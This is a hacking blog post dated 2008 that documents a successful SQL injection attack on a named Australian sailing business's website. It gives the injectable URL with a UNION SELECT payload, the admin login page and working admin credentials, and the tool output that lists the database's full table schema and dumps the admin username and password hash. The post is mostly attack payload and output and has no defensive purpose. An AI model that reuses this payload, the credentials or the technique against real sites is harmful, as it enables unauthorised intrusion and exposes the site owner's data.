viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Saturday, November 22, 2008

[SQLi] http://www.highperformancesailing.com.au

7:17 PM Posted by viperfx07 No comments
Tools = schemafuzz.py
Admin page = http://www.highperformancesailing.com.au/admin/
Admin usr/pwd = admin:admin

Database info:
[+] URL:http://www.highperformancesailing.com.au/news.php?id=31+AND+1=2+UNION+SELECT+0,sqli,2,3--
[+] Evasion Used: "+" "--"
[+] 19:12:04
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sailing_hps
User: sailing_sailing@localhost
Version: 5.0.51a-community

[Database]: sailing_hps
[Table: Columns]
[0]t_about: f_id,f_image,f_image2,f_title,f_content,f_content_small
[1]t_admin: f_id,f_username,f_password
[2]t_contact: f_id,f_address,f_phone,f_fax,f_email,f_post,f_map,f_content
[3]t_course: f_id,f_name,f_image,f_elements,f_content,f_content_small
[4]t_course_class2: f_id,f_coursid,f_name,f_image,f_content,f_elements
[5]t_course_class3: f_id,f_coursid,f_cours2id,f_name,f_image,f_content,f_elements
[6]t_link: f_id,f_name,f_type,f_image,f_url
[7]t_linktype: f_id,f_title
[8]t_news: f_id,f_title,f_content,f_addtime
[9]t_photo: f_id,f_title,f_image,f_content,f_addtime
[10]t_price: f_id,f_type,f_name,f_money
[11]t_price_type: f_id,f_title
[12]t_staff: f_id,f_name,f_job,f_intro,f_photo,f_addtime
[13]t_staff_match: f_id,f_staffid,f_year,f_type,f_match,f_city,f_country,f_place
[14]t_staff_title: f_id,f_staffid,f_certify,f_title
[15]t_testimonial: f_id,f_test,f_name,f_addtime

[-] [19:13:28]
[-] Total URL Requests 82
[-] Done


[+] URL:http://www.highperformancesailing.com.au/news.php?id=31+AND+1=2+UNION+SELECT+0,sqli,2,3--
[+] Evasion Used: "+" "--"
[+] 19:14:40
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sailing_hps
User: sailing_sailing@localhost
Version: 5.0.51a-community
[+] Dumping data from database "sailing_hps" Table "t_admin"
[+] Column(s) ['f_username', 'f_password']
[+] Number of Rows: 1

[0] admin:21232f297a57a5a743894a0e4a801fc3

[-] [19:14:43]
[-] Total URL Requests 3
[-] Done

0 comments:

Post a Comment